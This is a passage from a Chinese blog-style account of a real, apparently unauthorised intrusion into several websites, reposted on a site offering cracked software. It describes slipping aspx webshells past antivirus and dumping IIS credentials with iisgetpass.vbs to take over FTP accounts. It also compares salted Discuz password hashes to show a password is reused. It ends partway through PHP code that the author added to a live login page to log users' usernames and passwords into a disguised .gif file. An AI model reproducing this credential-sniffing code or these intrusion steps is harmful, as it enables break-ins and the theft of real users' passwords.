免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

当前位置: 主页 > 网站相关 > 网站安全 > 一次艰难的渗透过程(涉及到内容很广)(7)

一次艰难的渗透过程(涉及到内容很广)(7)

时间:2012-04-16 20:47来源:未知 整理:寂涯网络 点击:

http://www.bbb.com/exp.php时,立刻出现了如图 17 的错误:
图17

从图 17 返回的内容来看,应该是没有成功。后来我在 vmware_win2003 设置了和目标操
作系统+php 版本+php 执行方式(ISAPI)一模一样的环境,我顺利反弹回来一个 nt network
权限的 shell。这里我考虑应该是w3wp.exe 执行的 shellcode ,所以继承w3wp的 nt network
权限。但不论怎样也是个交互式可执行命令的 shell 啊。我第 6 次悲催的运气,促使我终于
找到了答案,原来目标 win2003 打开了 dep(堆栈数据执行保护)。
我仍然没有气馁,虽然上次域名过期那个站的目录没有执行aspx的权限,那么这
www.bbb.com的目录我还没试呢。万一支持aspx不就又多一种执行命令的方法吗?即这个
方法:
 
System.Diagnostics.Process.Start(@"calc.exe");)
这次我果然没有再次苦命,bbb.com 是支持 aspx 的,只是有两个问题需要解决。
1.护卫神几乎杀光了所有的 aspx 木马,需要突破。
2.星外虚拟主机的可写可执行目录的寻找是个大麻烦。需要寻觅一个,上传 cmd.exe,来支
持 aspx 执行命令,因为大家都知道 win2003 默认情况,c:\windows\system32\cmd.exe 只
对 administrator 有权限读写。
第一个问题比较好解决,我记得我写过一篇在黑客手册发表的《浅谈在 webshell 下执
行命令》这一篇文,里面有我提供的三种 aspx 执行命令的小马。使用任何一个,改变一下
字段名,除去敏感字符串,再把函数位置条换一下。也就能过了,最多也就是再加密一下而
已。这个难不倒我,毕竟混在看雪论坛研究加密解密算法也有几年光景。 至于第二个问题,我倒没有什么好方法,只能写个遍历脚本,测试可读的每一个目录是否有 漏网的可写目录存在了。这个网上有很多先人已经写出过这样的方法了,用拿来主义改一改即可。
终于被我找到了星外的一个可写目录是:
C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index 剩下的事情就简单了,我也懒得用 pr 大杀器,也用不着最新 windows 全版本的 0day 提权 exp 这个牛刀了。直接传一个 cscript.exe+iisgetpass.vbs 读出所有网站用户的配置信息和密码即可。iisgetpass.vbs 代码大家都有,我就不在这里 占篇幅了。
最终结果如图 18:
图18
 

一般这样的结构的网站,iis 账户的密码就是 ftp 的密码。就这样我得到了 a.111.com
的 ftp 账户和密码,并成功把其拿下。
由于主目标 www.aaa.com只开 80,也无法用这个ftp密码去尝试它,并且再用这个密码尝试其
论坛管理员的密码又无结果,只能继续嗅探了。


php 嗅探目标管理员密码

拿下a.111.com后,还是有一些惊喜的。我看到了 错误!超链接引用无效。 错误!超链接引用无效。中,并且我经过转换,其管理员的discuz! Hash密码与a.111.com的md5 hash 密码是一样的。
其实这个对比很简单。
假设 a.111.com 中管理员的密码 hash 为:228ab4dd53787ce32a88ade0eeea8a51
早期 错误!超链接引用无效。理员密码hash为:
8946fa73f2b44b64da2ebab1aaa57ec6:42ee90
那么测试 md5(228ab4dd53787ce32a88ade0eeea8a5142ee90)如果等于
8946fa73f2b44b64da2ebab1aaa57ec6,则说明两个密码的明文是一样的。
因为 discuz 加密的方式是:md5(md5($pass).$salt),我恰恰证实了这一点。
由于密码的复杂度不是现代的人类所能暴力破解的,我于是又一次选择了 php 登陆口密码嗅
探。
于此同时还在继续着另一个工作,就是查找那个帖子所在版块的斑竹的用户名,拿到这 些任何一个斑竹的密码不也一样能删帖子达到目的吗?但第 7 次悲催的运气告诉我,你省省 吧,人家那个版块的斑竹就是管理员一个人。我再次无语。还是老老实实的写代码嗅探吧。 我找到 a.111.com 的前台和后台登陆口添加了下面的代码。

$username1 = $this->Username;
$password1 = $this->Password;
$file="././images/ bg1.gif";
$handle = @fopen("././images/th_bg1.gif", "a");
$recontent = fread($handle,filesize($file));
$content= $username1."----".$password1."----date is:".date("Y-m-d

本页地址 http://www.jybase.net/wangzhananquan/20120416827.html

百度搜索更多

谷歌搜索更多

顶一下
(1)
50%
踩一下
(1)
50%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片
推荐内容
赞助商
赞助商


关于本站免责声明视频更新google百度地图视频地图RRS订阅

如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com